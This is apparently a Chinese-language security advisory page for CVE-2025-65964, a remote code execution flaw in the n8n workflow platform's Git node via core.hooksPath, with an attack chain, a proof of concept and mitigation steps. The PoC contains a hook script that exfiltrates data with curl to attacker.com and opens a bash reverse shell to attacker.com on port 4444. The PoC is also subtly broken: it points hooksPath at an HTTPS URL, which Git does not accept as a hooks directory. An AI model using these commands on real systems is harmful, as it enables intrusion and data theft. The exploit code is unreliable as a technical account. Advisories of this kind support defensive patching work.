CVE-2025-65964 CVSS 8.8 高危

n8n workflow automation platform 远程代码执行漏洞 (CVE-2025-65964)

披露日期: 2025-12-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-65964

漏洞类型

远程代码执行(RCE)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

n8n workflow automation platform

漏洞概述

n8n是一个开源的工作流自动化平台。CVE-2025-65964漏洞存在于n8n的Git节点功能中，攻击者可以通过该节点设置任意Git配置值，包括core.hooksPath参数，从而在后续Git操作时执行恶意Git hook，达到远程代码执行的目的。该漏洞影响n8n版本0.123.1至1.119.1。攻击者需要具备创建或修改n8n工作流的权限才能利用此漏洞。由于Git hook可以在Git操作时自动执行任意脚本，攻击者可以利用此漏洞在n8n服务器上执行任意系统命令，获取服务器完全控制权。此漏洞已被修复，版本1.119.2及之后版本不存在此安全问题。

技术细节

n8n的Git节点提供了Add Config操作，允许用户在工作流中设置Git配置选项。正常情况下，Git配置用于设置用户信息、编辑器等常规选项。然而，该功能没有对可设置的配置项进行限制，攻击者可以设置core.hooksPath配置，该配置指定Git hook脚本的存放目录。通过将hooksPath指向攻击者控制的目录，攻击者可以在该目录中植入恶意hook脚本（如post-commit、pre-commit等）。当n8n执行Git操作（如commit、push、pull等）时，Git会自动执行这些hook脚本，从而在n8n服务器上以n8n进程权限执行任意命令。攻击者利用此漏洞可以完全控制n8n服务器，窃取敏感数据、植入后门或进一步横向移动。

攻击链分析

STEP 1

步骤1

攻击者获取n8n工作流创建或修改权限（通过合法账户或社会工程学）

STEP 2

步骤2

攻击者创建或修改一个使用Git节点的工作流，配置core.hooksPath指向恶意hook目录

STEP 3

步骤3

在工作流中执行Git操作（commit、push、pull等），触发Git hook执行

STEP 4

步骤4

恶意hook脚本以n8n进程权限在服务器上执行任意系统命令

STEP 5

步骤5

攻击者实现远程代码执行，可窃取敏感数据、建立持久化后门或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-65964 PoC - Malicious Git hook via n8n Git node
// This PoC demonstrates how to exploit the vulnerability

// Step 1: Create a malicious hook script on attacker-controlled server
const maliciousHook = `#!/bin/bash
# Malicious post-commit hook
curl https://attacker.com/exfil?data=$(whoami)
# Reverse shell or other malicious actions
/bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1`;

// Step 2: Workflow JSON to exploit via n8n Git node
const exploitWorkflow = {
  "name": "CVE-2025-65964 Exploit",
  "nodes": [
    {
      "parameters": {
        "operation": "addConfig",
        "gitConfig": {
          "key": "core.hooksPath",
          "value": "https://attacker.com/malicious-hooks/"
        }
      },
      "name": "Git Node",
      "type": "n8n-nodes-base.git"
    }
  ],
  "connections": {}
};

// Step 3: When n8n performs any Git operation, the hook executes
// Example: The hook could exfiltrate credentials, establish persistence, etc.

console.log('PoC for CVE-2025-65964');
console.log('Exploit: Set core.hooksPath to attacker-controlled directory');
console.log('Impact: Arbitrary code execution on n8n server during Git operations');

影响范围

n8n 0.123.1 - 1.119.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下缓解措施：1) 在n8n安全设置中排除Git节点（n8n-docs.teamlab.info/hosting/securing/blocking-nodes/#exclude-nodes）；2) 避免使用Git节点克隆或交互不受信任的仓库；3) 限制用户对工作流的创建和编辑权限；4) 监控Git节点执行日志，及时发现异常行为；5) 使用网络隔离，限制n8n服务器的网络访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表